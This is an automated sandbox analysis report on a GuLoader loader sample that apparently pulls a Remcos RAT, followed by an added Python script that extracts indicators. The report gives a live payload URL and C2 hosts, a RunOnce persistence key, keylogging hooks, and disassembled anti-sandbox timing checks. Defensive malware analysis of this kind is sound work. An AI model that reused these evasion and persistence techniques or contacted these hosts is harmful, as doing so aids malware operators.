Windows Analysis Report JXblq0dqPN.exe

Overview

General Information

Sample Name: JXblq0dqPN.exe
Analysis ID: 458740
MD5: 8718d75b7cac53f13d01ddea9b52cee0
SHA1: 2a37a01df74c887bb52eb2762d7d6ae0bd5e6b0b
SHA256: 6f40242247db00eea1922d0c2a38337ddea49d9da02693679d2e4bfb19e6c088
Tags: exe, GuLoader

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
GuLoader behavior detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Creates autostart registry keys with suspicious values (likely registry only malware)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses dynamic DNS services
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Classification label (from the System Summary below): mal100.troj.spyw.evad.winEXE@3/3@164/3. The header names only the first stage (GuLoader); the System Summary also records the directory C:\Users\user\AppData\Roaming\remcos and the mutex \Sessions\1\BaseNamedObjects\Remcos-FAZALZ, artifacts consistent with a Remcos RAT payload being fetched from the configured URL and executed by the loader.

AV Detection:

Found malware configuration
Source: 00000001.00000002.387951770.0000000002260000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_fkWglQyCXO188.bin"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exe ReversingLabs: Detection: 17%
Multi AV Scanner detection for submitted file
Source: JXblq0dqPN.exe Virustotal: Detection: 35%
Source: JXblq0dqPN.exe ReversingLabs: Detection: 17%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: JXblq0dqPN.exe Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: JXblq0dqPN.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin
Uses dynamic DNS services
Source: unknown DNS query: name: wealthyrem.ddns.net
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49746 -> 194.5.97.128:39200
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DANILENKODE
Source: Joe Sandbox View ASN Name: SHINJIRU-MY-AS-AP Shinjiru Technology Sdn Bhd, MY
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
    GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: 101.99.94.119
    Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119 (50 identical entries in the original listing; the payload host is contacted by IP literal, so no DNS resolution precedes it)
Source: unknown DNS traffic detected: queries for: clientconfig.passport.net
Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin
Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp String found in binary or memory: http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.0
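The evidence lines in this report are a fixed, machine-generated format, so they can be turned into typed indicators mechanically. The script below is an added example, not part of the Joe Sandbox report: it parses lines copied from this page (Networking, System Summary and Boot Survival), strips the page's "Jump to ..." link residue, re-splits the HTTP request that extraction flattened onto one line, keeps only the remote side of the TCP connection (the sandbox VM's own 192.168.2.7 is not an indicator), drops the Windows background query clientconfig.passport.net, and flags the dynamic-DNS hostname. The benign-domain list and the dynamic-DNS suffix list are my assumptions, not data from the report.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Evidence lines copied from this report; the trailing "Jump to ..." text is link
# residue from the page extraction, kept here so the parser demonstrates removing it.
REPORT_LINES = [
    "Source: Malware configuration extractor URLs: http://101.99.94.119/WEALTH_fkWglQyCXO188.bin",
    "Source: unknown DNS query: name: wealthyrem.ddns.net",
    "Source: global traffic TCP traffic: 192.168.2.7:49746 -> 194.5.97.128:39200",
    ("Source: global traffic HTTP traffic detected: GET /WEALTH_fkWglQyCXO188.bin HTTP/1.1"
     "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
     "Host: 101.99.94.119Cache-Control: no-cache"),
    "Source: unknown TCP traffic detected without corresponding DNS query: 101.99.94.119",
    "Source: unknown DNS traffic detected: queries for: clientconfig.passport.net",
    r"Source: C:\Users\user\Desktop\JXblq0dqPN.exe File created: C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exe Jump to dropped file",
    r"Source: C:\Users\user\Desktop\JXblq0dqPN.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.vbs Jump to behavior",
    r"Source: C:\Users\user\Desktop\JXblq0dqPN.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ",
]

BENIGN_DOMAINS = {"clientconfig.passport.net"}   # assumption: Windows background traffic, not an IOC
DDNS_SUFFIXES = ("ddns.net", "no-ip.com", "no-ip.org", "hopto.org", "zapto.org", "duckdns.org")  # assumption
HEADER_START = re.compile(r"(?=(?:User-Agent|Host|Cache-Control|Accept|Connection):)")
LINK_RESIDUE = re.compile(r"\s+Jump to (?:behavior|dropped file)$")

def split_http_request(blob):
    """Re-insert the line breaks the page extraction removed between request line and headers."""
    return [p.strip() for p in HEADER_START.split(blob) if p.strip()]

def is_remote(addr):
    try:
        return ipaddress.ip_address(addr).is_global   # False for the sandbox's 192.168.2.7
    except ValueError:
        return False

def add_host(iocs, host):
    """File a hostname as a public IP, a domain, or nothing (private IP / known-benign domain)."""
    if host is None:
        return
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:                                 # not an IP literal: treat as a domain
        if host not in BENIGN_DOMAINS:
            iocs["domains"].add(host)
            if host.endswith(DDNS_SUFFIXES):
                iocs["dynamic_dns"].add(host)
        return
    if ip.is_global:
        iocs["ips"].add(host)

def extract_iocs(lines):
    iocs = {k: set() for k in ("urls", "domains", "dynamic_dns", "ips", "ports",
                                "dropped_files", "registry", "mutexes")}
    iocs["http_requests"] = []
    for raw in lines:
        line = LINK_RESIDUE.sub("", raw)
        if m := re.search(r"\bURLs?: (https?://\S+)", line):
            iocs["urls"].add(m.group(1))
            add_host(iocs, urlparse(m.group(1)).hostname)
        elif m := re.search(r"DNS query: name: (\S+)|queries for: (\S+)", line):
            add_host(iocs, m.group(1) or m.group(2))
        elif m := re.search(r"without corresponding DNS query: (\S+)", line):
            add_host(iocs, m.group(1))
        elif m := re.search(r"TCP traffic: (\S+):(\d+) -> (\S+):(\d+)", line):
            for host, port in ((m.group(1), m.group(2)), (m.group(3), m.group(4))):
                if is_remote(host):                    # record only the remote endpoint and its port
                    add_host(iocs, host)
                    iocs["ports"].add(int(port))
        elif m := re.search(r"HTTP traffic detected: (.*)$", line):
            request = split_http_request(m.group(1))
            iocs["http_requests"].append(request)
            for header in request:
                if header.lower().startswith("host:"):
                    add_host(iocs, header.split(":", 1)[1].strip())
        elif m := re.search(r"File created: (\S+)", line):
            iocs["dropped_files"].add(m.group(1))
        elif m := re.search(r"Registry value created or modified: (\S+) (\S+)(?: (\S+))?$", line):
            iocs["registry"].add((m.group(1), m.group(2), m.group(3)))   # key, value name, data
        elif m := re.search(r"Mutant created: (\S+)", line):
            iocs["mutexes"].add(m.group(1))
    return iocs

if __name__ == "__main__":
    for kind, values in extract_iocs(REPORT_LINES).items():
        print(f"{kind}: {values}")
```

The path regexes assume the sandbox's paths contain no spaces, which holds for this report but not in general; the registry pattern in particular should be tightened before reuse on reports from other machines.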

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Windows user hook set: 0 keyboard low level (WH_KEYBOARD_LL) C:\Users\user\Desktop\JXblq0dqPN.exe
Creates a DirectInput object (often for capturing keystrokes)
Source: JXblq0dqPN.exe, 00000001.00000002.387805653.00000000007CA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

System Summary:

Abnormal high CPU Usage
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Process Stats: CPU usage > 98%
Contains functionality to call native functions
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02261C35 NtWriteVirtualMemory, 1_2_02261C35
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02267012 NtWriteVirtualMemory,GetLongPathNameW, 1_2_02267012
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_0226904A NtProtectVirtualMemory, 1_2_0226904A
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022658B5 NtAllocateVirtualMemory, 1_2_022658B5
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_0226483C NtWriteVirtualMemory, 1_2_0226483C
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02264A0A NtWriteVirtualMemory, 1_2_02264A0A
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02264C62 NtWriteVirtualMemory, 1_2_02264C62
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022646B5 NtWriteVirtualMemory, 1_2_022646B5
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022642BF NtWriteVirtualMemory, 1_2_022642BF
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_0226473E NtWriteVirtualMemory, 1_2_0226473E
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02265983 NtAllocateVirtualMemory, 1_2_02265983
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02264BEB NtWriteVirtualMemory, 1_2_02264BEB
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02268FFF NtProtectVirtualMemory, 1_2_02268FFF
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02264BC5 NtWriteVirtualMemory, 1_2_02264BC5
Detected potential crypto function
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02261C35 1_2_02261C35
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02267012 1_2_02267012
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022658B5 1_2_022658B5
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022624E2 1_2_022624E2
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022620EC 1_2_022620EC
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_0226950D 1_2_0226950D
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02260557 1_2_02260557
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022685F4 1_2_022685F4
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02260BF8 1_2_02260BF8
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02260223 1_2_02260223
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_0226483C 1_2_0226483C
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02264A0A 1_2_02264A0A
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02264214 1_2_02264214
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02264C62 1_2_02264C62
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02266475 1_2_02266475
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02260647 1_2_02260647
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02260641 1_2_02260641
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_0226885F 1_2_0226885F
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022646B5 1_2_022646B5
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022614B3 1_2_022614B3
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022642BF 1_2_022642BF
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022626BA 1_2_022626BA
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02263896 1_2_02263896
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02267E98 1_2_02267E98
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022628E2 1_2_022628E2
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022680FC 1_2_022680FC
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02265CD0 1_2_02265CD0
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02262D2C 1_2_02262D2C
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_0226473E 1_2_0226473E
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02260D0E 1_2_02260D0E
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02260708 1_2_02260708
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_0226951E 1_2_0226951E
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_0226111B 1_2_0226111B
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02268764 1_2_02268764
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02263D6D 1_2_02263D6D
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02267776 1_2_02267776
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02260B71 1_2_02260B71
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02262F7B 1_2_02262F7B
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02263147 1_2_02263147
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02262F54 1_2_02262F54
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022615A5 1_2_022615A5
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02263FA3 1_2_02263FA3
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02267FAE 1_2_02267FAE
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02265D82 1_2_02265D82
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_0226218A 1_2_0226218A
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02267BEC 1_2_02267BEC
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02264BEB 1_2_02264BEB
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02264BC5 1_2_02264BC5
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022637C8 1_2_022637C8
PE file contains strange resources
Source: JXblq0dqPN.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: JXblq0dqPN.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ANNONCEKAMPAGNE.exe.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ANNONCEKAMPAGNE.exe.17.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: JXblq0dqPN.exe, 00000001.00000000.229744008.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUBESKADIGEDES.exe vs JXblq0dqPN.exe
Source: JXblq0dqPN.exe, 00000001.00000002.387697389.0000000000770000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs JXblq0dqPN.exe
Source: JXblq0dqPN.exe, 00000011.00000002.1310162102.0000000002400000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamemswsock.dll.muij% vs JXblq0dqPN.exe
Source: JXblq0dqPN.exe, 00000011.00000000.386257006.0000000000417000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUBESKADIGEDES.exe vs JXblq0dqPN.exe
Source: JXblq0dqPN.exe Binary or memory string: OriginalFilenameUBESKADIGEDES.exe vs JXblq0dqPN.exe
Uses 32bit PE files
Source: JXblq0dqPN.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/3@164/3
Source: C:\Users\user\Desktop\JXblq0dqPN.exe File created: C:\Users\user\AppData\Roaming\remcos
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Mutant created: \Sessions\1\BaseNamedObjects\Remcos-FAZALZ
Source: C:\Users\user\Desktop\JXblq0dqPN.exe File created: C:\Users\user~1\AppData\Local\Temp\~DF27FD92C68F09D524.TMP
Source: JXblq0dqPN.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\JXblq0dqPN.exe File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
Source: JXblq0dqPN.exe Virustotal: Detection: 35%
Source: JXblq0dqPN.exe ReversingLabs: Detection: 17%
Source: C:\Users\user\Desktop\JXblq0dqPN.exe File read: C:\Users\user\Desktop\JXblq0dqPN.exe
Source: unknown Process created: C:\Users\user\Desktop\JXblq0dqPN.exe 'C:\Users\user\Desktop\JXblq0dqPN.exe'
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Process created: C:\Users\user\Desktop\JXblq0dqPN.exe 'C:\Users\user\Desktop\JXblq0dqPN.exe'
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000001.00000002.387951770.0000000002260000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_00401367 pushfd ; iretd 1_2_0040136A
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_00403268 pushfd ; iretd 1_2_0040326E
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_0226A0E4 push FFFFFFD2h; iretd 1_2_0226A0E9
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 17_2_0056A0E4 push FFFFFFD2h; iretd 17_2_0056A0E9
Source: initial sample Static PE information: section name: .text entropy: 7.08584386702

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\JXblq0dqPN.exe File created: C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exe

Boot Survival:

Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.vbs (the value was written twice with this data; four further writes to the same value were logged without data)
Windows deletes a RunOnce value once it has been executed at the next logon, so this is a one-shot relaunch through a script in the user's Temp directory rather than a permanent autostart. The .vbs is not a PE file and therefore does not appear under Drops PE files; the fragment Set W = CreateObject("WScript.Shell") recovered from process memory next to the \ANNONCEKAMPAGNE.EXE\ROGUY strings (see Malware Analysis System Evasion) is consistent with its content.
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Process information set: NOOPENFILEERRORBOX (9 occurrences)

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02261C35 NtWriteVirtualMemory, 1_2_02261C35
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02267012 NtWriteVirtualMemory,GetLongPathNameW, 1_2_02267012
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022685F4 LoadLibraryA, 1_2_022685F4
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_02260BF8 TerminateProcess,LoadLibraryA, 1_2_02260BF8
Source: C:\Users\user\Desktop\JXblq0dqPN.exe Code function: 1_2_022642BF NtWriteVirtualMemory, 1_2_022642BF
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 0000000002267485 second address: 0000000002267485 instructions:
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 00000000022662D6 second address: 00000000022662D6 instructions:
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 0000000002264EA5 second address: 0000000002264EA5 instructions:
Tries to detect Any.run
Source: C:\Users\user\Desktop\JXblq0dqPN.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe (2 occurrences)
Source: C:\Users\user\Desktop\JXblq0dqPN.exe File opened: C:\Program Files\qga\qga.exe (2 occurrences)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL\ANNONCEKAMPAGNE.EXE\ROGUYSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCEOTATE
Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmp, JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=\ANNONCEKAMPAGNE.EXE\ROGUYSET W = CREATEOBJECT("WSCRIPT.SHELL")
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 0000000002267485 second address: 0000000002267485 instructions:
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 00000000022698AE second address: 0000000002269A11 instructions:
    0x00000000 rdtsc
    0x00000002 popad
    0x00000003 pop eax
    0x00000004 call 00007F7648A60838h
    0x00000009 mov bl, byte ptr [eax]
    0x0000000b test ebx, eax
    0x0000000d mov byte ptr [ebp+000001EFh], FFFFFFCFh
    0x00000014 xor byte ptr [ebp+000001EFh], 00000064h
    0x0000001b xor byte ptr [ebp+000001EFh], 00000049h
    0x00000022 sub byte ptr [ebp+000001EFh], 00000016h
    0x00000029 cmp bl, byte ptr [ebp+000001EFh]
    0x0000002f je 00007F7648A607CBh
    0x00000031 mov bx, word ptr [eax]
    0x00000034 cmp eax, edx
    0x00000036 test edi, 0B419DFAh
    0x0000003c mov word ptr [ebp+00000218h], si
    0x00000043 mov si, 2562h
    0x00000047 jmp 00007F7648A608E5h
    0x0000004c pushad
    0x0000004d lfence
    0x00000050 rdtsc
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 0000000002267E2C second address: 0000000002267E2C instructions:
    0x00000000 rdtsc
    0x00000002 lfence
    0x00000005 shl edx, 20h
    0x00000008 or edx, eax
    0x0000000a ret
    0x0000000b mov esi, edx
    0x0000000d pushad
    0x0000000e mov eax, F567E6A1h
    0x00000013 xor eax, 7B1C69AEh
    0x00000018 xor eax, 278FAC68h
    0x0000001d xor eax, A9F42366h
    0x00000022 cpuid
    0x00000024 bt ecx, 1Fh
    0x00000028 jc 00007F764878D3EDh
    0x0000002e cmp bh, dh
    0x00000030 popad
    0x00000031 call 00007F764878CF02h
    0x00000036 lfence
    0x00000039 rdtsc
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 00000000022662D6 second address: 00000000022662D6 instructions:
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 0000000002264561 second address: 0000000002269606 instructions:
    0x00000000 rdtsc
    0x00000002 popad
    0x00000003 mov edx, dword ptr [ebp+0000027Ah]
    0x00000009 push 64FFFEF9h
    0x0000000e add dword ptr [esp], 9B136642h
    0x00000015 xor dword ptr [esp], 8588ACC3h
    0x0000001c xor dword ptr [esp], 859BC9F8h
    0x00000023 cmp cx, cx
    0x00000026 push dword ptr [ebp+50h]
    0x00000029 call 00007F7648791C6Eh
    0x0000002e call 00007F764878CCF5h
    0x00000033 pop ebx
    0x00000034 sub ebx, 05h
    0x00000037 mov dword ptr [ebp+0000014Ch], edi
    0x0000003d jmp 00007F764878CDD9h
    0x00000042 pushad
    0x00000043 mov esi, 00000069h
    0x00000048 rdtsc
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 0000000002264936 second address: 0000000002269606 instructions:
    0x00000000 rdtsc
    0x00000002 popad
    0x00000003 mov dword ptr [ebp+0000010Ch], 00000000h
    0x0000000d mov eax, ebp
    0x0000000f add eax, 0000010Ch
    0x00000014 mov dword ptr [ebp+0000021Ch], edi
    0x0000001a mov edi, eax
    0x0000001c push edi
    0x0000001d mov edi, dword ptr [ebp+0000021Ch]
    0x00000023 push dword ptr [ebp+000000FCh]
    0x00000029 call 00007F7648A653A9h
    0x0000002e call 00007F7648A60805h
    0x00000033 pop ebx
    0x00000034 sub ebx, 05h
    0x00000037 mov dword ptr [ebp+0000014Ch], edi
    0x0000003d jmp 00007F7648A608E9h
    0x00000042 pushad
    0x00000043 mov esi, 00000069h
    0x00000048 rdtsc
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 0000000002264EA5 second address: 0000000002264EA5 instructions:
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 00000000005698AE second address: 0000000000569A11 instructions: identical to the 00000000022698AE listing above (the same code runs in process 17 at 00560000 instead of 02260000)
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 0000000000567E2C second address: 0000000000567E2C instructions: identical to the 0000000002267E2C listing above (same code, process 17 at 00560000)
Source: C:\Users\user\Desktop\JXblq0dqPN.exe RDTSC instruction interceptor: First address: 000000000056177F second address: 0000000000561808 instructions:
    0x00000000 rdtsc
    0x00000002 popad
    0x00000003 cmp dword ptr [ebp+0000025Bh], eax
    0x00000009 mov eax, dword ptr [ebp+0000025Bh]
    0x0000000f je 00007F7648A60C92h
    0x00000015 test bl, bl
    0x00000017 push 038032CBh
    0x0000001c sub dword ptr [esp], 0FF21A02h
    0x00000023 xor dword ptr [esp], 10B6888Fh
    0x0000002a xor dword ptr [esp], E3389046h
    0x00000031 push 2B523B77h
    0x00000036 cmp dh, ch
    0x00000038 xor dword ptr [esp], 6A5053ABh
    0x0000003f add dword ptr [esp], CC3008CFh
    0x00000046 xor dword ptr [esp], 0D3271ABh
    0x0000004d push dword ptr [ebp+24h]
    0x00000050 mov dword ptr [ebp+000001F4h], edx
    0x00000056 mov edx, 14EDA824h
    0x0000005b add edx, 104167D9h
    0x00000061 xor edx, BB5692E1h
    0x00000067 test al, dl
    0x00000069 xor edx, 9E799D1Ch
    0x0000006f push edx
    0x00000070 mov edx, dword ptr [ebp+000001F4h]
